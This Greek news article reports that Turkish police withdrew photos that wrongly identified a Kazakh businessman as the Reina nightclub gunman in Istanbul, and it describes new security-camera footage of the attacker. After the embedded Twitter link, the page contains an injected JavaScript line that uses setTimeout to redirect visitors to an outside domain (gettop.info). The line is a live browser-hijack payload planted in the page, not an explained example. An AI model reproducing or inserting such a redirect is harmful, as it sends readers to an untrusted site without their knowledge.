Γκάφα τουρκικής αστυνομίας: Λάθος οι φωτογραφίες του δράστη που έδωσε στη δημοσιότητα (ΕΙΚΟΝΕΣ-ΒΙΝΤΕΟ)

0
7

 

Έπειτα από διαμαρτυρία του ανθρώπου που απεικονιζόταν στις φωτογραφίες ως ο δράστης του μακελειού στην ντισκοτέκ Reina της Κωνσταντινούπολης, οι τουρκικές Αρχές διαπίστωσαν το λάθος τους και αποσύρουν τις συγκεκριμένες εικόνες που έκαναν τον γύρο του κόσμου και ταυτοποιούν ως τον μακελάρη της Πόλης έναν επιχειρηματία από το Καζακτάν.

Ο ίδιος όταν είδε το πρόσωπό του να κάνει τον γύρο του διαδικτύου εμφανίστηκε σε αστυνομικό τμήμα και διαμαρτυρήθηκε καταγγέλλοντας το λάθος της τουρκικής αστυνομίας καθώς βρίσκεται στη χώρα για εμπορικούς λόγους.

Οι Αρχές απολογήθηκαν και τώρα αποσύρουν τις επίμαχες φωτογραφίες τονίζοντας πως ο εικονιζόμενος δεν είναι ο μακελάρης στο κλαμπ.

Στο μεταξύ νέο βίντεο έρχεται στη δημοσιότητα από τις κάμερες ασφαλείας όπου ο δράστης της τρομοκρατικής επίθεσης εισέρχεται στον χώρο πυροβολώντας.

Επιπλέον, από τις κάμερες ασφαλείας απεικονίζεται ο δράστης να αλλάζει ρούχα προτού διαφύγει μετά το μακελειό στο κλαμπ.

https://twitter.com/News_Executive/status/815382764447027201 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here